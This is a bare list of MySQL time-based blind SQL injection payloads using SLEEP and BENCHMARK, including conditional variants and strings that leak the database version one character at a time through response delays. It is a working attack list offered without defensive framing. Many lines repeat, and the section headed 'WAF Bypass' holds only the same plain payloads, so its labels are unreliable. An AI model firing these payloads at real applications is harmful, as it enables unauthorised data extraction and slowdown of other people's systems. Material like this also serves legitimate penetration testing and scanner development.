# Sleep-based Time-based SQLi
' AND SLEEP(5) --
' AND SLEEP(5) /*
' AND SLEEP(5) #
' AND SLEEP(5) --
' AND SLEEP(5) /*
' AND SLEEP(5) #

# Benchmark-based Time-based SQLi
' AND BENCHMARK(1000000,MD5(1)) --
' AND BENCHMARK(1000000,MD5(1)) /*
' AND BENCHMARK(1000000,MD5(1)) #
' AND BENCHMARK(1000000,MD5(1)) --
' AND BENCHMARK(1000000,MD5(1)) /*
' AND BENCHMARK(1000000,MD5(1)) #

# Time-based with Comments
' AND SLEEP(5) --
' AND SLEEP(5) /*
' AND SLEEP(5) #
' AND BENCHMARK(1000000,MD5(1)) --
' AND BENCHMARK(1000000,MD5(1)) /*
' AND BENCHMARK(1000000,MD5(1)) #

# Time-based with Conditions
' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) --
' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) /*
' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) #
' AND (SELECT CASE WHEN (1=1) THEN BENCHMARK(1000000,MD5(1)) ELSE 0 END) --
' AND (SELECT CASE WHEN (1=1) THEN BENCHMARK(1000000,MD5(1)) ELSE 0 END) /*
' AND (SELECT CASE WHEN (1=1) THEN BENCHMARK(1000000,MD5(1)) ELSE 0 END) #

# Time-based with Information Gathering
' AND SLEEP(ASCII(SUBSTRING((SELECT version()),1,1))) --
' AND SLEEP(ASCII(SUBSTRING((SELECT version()),1,1))) /*
' AND SLEEP(ASCII(SUBSTRING((SELECT version()),1,1))) #
' AND BENCHMARK(ASCII(SUBSTRING((SELECT version()),1,1))*1000000,MD5(1)) --
' AND BENCHMARK(ASCII(SUBSTRING((SELECT version()),1,1))*1000000,MD5(1)) /*
' AND BENCHMARK(ASCII(SUBSTRING((SELECT version()),1,1))*1000000,MD5(1)) #

# WAF Bypass for Time-based
' AND SLEEP(5) --
' AND SLEEP(5) /*
' AND SLEEP(5) #
' AND BENCHMARK(1000000,MD5(1)) --
' AND BENCHMARK(1000000,MD5(1)) /*
' AND BENCHMARK(1000000,MD5(1)) #
